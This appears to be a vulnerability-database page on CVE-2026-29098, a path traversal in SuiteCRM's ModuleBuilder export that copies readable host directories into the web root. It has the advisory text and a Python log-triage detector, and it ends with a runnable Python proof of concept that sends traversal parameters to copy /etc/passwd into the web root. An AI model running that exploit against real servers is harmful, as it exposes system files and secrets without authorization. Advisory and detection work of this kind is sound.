Security Vulnerability Report
CVE-2026-29098 CVSS 4.9 MEDIUM

CVE-2026-29098

Published: 2026-03-19 23:16:42
Last Modified: 2026-03-24 14:48:31

Description

SuiteCRM is an open-source, enterprise-ready Customer Relationship Management (CRM) software application. Prior to versions 7.15.1 and 8.9.3, the `action_exportCustom` function in `modules/ModuleBuilder/controller.php` fails to properly neutralize path traversal sequences in the `$modules` and `$name` parameters. Both parameters later reach the `exportCustom` function in `modules/ModuleBuilder/MB/MBPackage.php`, where they are used to construct paths for file reading and writing. As a result, a user with access to the ModuleBuilder module, generally an administrator, can craft a request that copies the content of any readable directory on the underlying host into the web root, making it readable. Because the `ModuleBuilder` module is part of both major versions 7 and 8, both current major versions are affected. The copied content can include system files such as the content of `/etc`, or the root directory of the web server, potentially exposing secrets and environment variables. Versions 7.15.1 and 8.9.3 patch the issue.
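A log-triage check for the flaw described above, as an added example that is not part of the advisory or of SuiteCRM's code: it flags ModuleBuilder export requests whose `modules` or `name` value resolves outside an export base directory. The request field names follow the request shown in this page's PoC; the record shape (already-parsed request parameters, for example from a WAF or audit log), the `EXPORT_BASE` path and the function names are assumptions.

```python
import posixpath
from urllib.parse import unquote

# Assumed export base; the real directory used by SuiteCRM is not given on the page.
EXPORT_BASE = "/var/www/suitecrm/custom/modulebuilder"


def decode_fully(value, max_rounds=3):
    """Undo nested URL-encoding (%252e%252e -> ..) so encoded traversal is visible."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def escapes_base(component, base=EXPORT_BASE):
    """True if joining `component` under `base` lands outside `base`.

    Lexical check for log triage only; a server-side fix would also need to
    resolve symlinks (realpath) before comparing against the base.
    """
    cleaned = decode_fully(component).replace("\\", "/")
    if "\x00" in cleaned:
        return True
    resolved = posixpath.normpath(posixpath.join(base, cleaned))
    return not (resolved == base or resolved.startswith(base + "/"))


def suspicious_exports(records):
    """Return (record index, field) pairs for ModuleBuilder exportCustom
    requests whose `modules` or `name` value leaves the export base."""
    hits = []
    for i, params in enumerate(records):
        if params.get("module") != "ModuleBuilder" or params.get("action") != "exportCustom":
            continue
        for field in ("modules", "name"):
            if escapes_base(params.get(field, "")):
                hits.append((i, field))
    return hits


# Constructed sample records (parsed request parameters), not real traffic.
SAMPLE = [
    {"module": "ModuleBuilder", "action": "exportCustom", "modules": "Accounts", "name": "backup1"},
    {"module": "ModuleBuilder", "action": "exportCustom", "modules": "../../../../../../etc", "name": "passwd"},
    {"module": "ModuleBuilder", "action": "exportCustom", "modules": "Accounts", "name": "%252e%252e%252fconfig"},
    {"module": "Accounts", "action": "index", "modules": "../x", "name": "y"},
]
```

Running `suspicious_exports(SAMPLE)` flags the second and third records; the fourth is ignored because it does not target the ModuleBuilder export action.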

CVSS Details

CVSS Score: 4.9
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:suitecrm:suitecrm:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:suitecrm:suitecrm:*:*:*:*:*:*:*:* - VULNERABLE
SuiteCRM < 7.15.1
SuiteCRM < 8.9.3

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests


def exploit(target_url, session):
    """
    PoC for CVE-2026-29098 Path Traversal in SuiteCRM.
    Copies /etc/passwd to the web root.
    """
    # The endpoint vulnerable to path traversal
    url = f"{target_url}/index.php"

    # Payload parameters to traverse to /etc/passwd
    data = {
        "module": "ModuleBuilder",
        "action": "exportCustom",
        "modules": "../../../../../../etc",  # Path traversal sequence
        "name": "passwd"
    }
    headers = {
        "Content-Type": "application/x-www-form-urlencoded"
    }

    try:
        response = session.post(url, data=data, headers=headers, timeout=10)
        if response.status_code == 200:
            print("[+] Request sent successfully. Check the web root for the 'passwd' file.")
        else:
            print(f"[-] Exploit failed with status code: {response.status_code}")
    except Exception as e:
        print(f"[-] An error occurred: {e}")


# Usage example
# session = requests.Session()
# session.post("http://target/login", auth=("admin", "password"))
# exploit("http://target", session)
```

References

https://docs.suitecrm.com/admin/releases/7.15.x (Release Notes)
https://github.com/SuiteCRM/SuiteCRM/security/advisories/GHSA-6858-fhw5-56gf (Vendor Advisory)

Weakness: CWE-23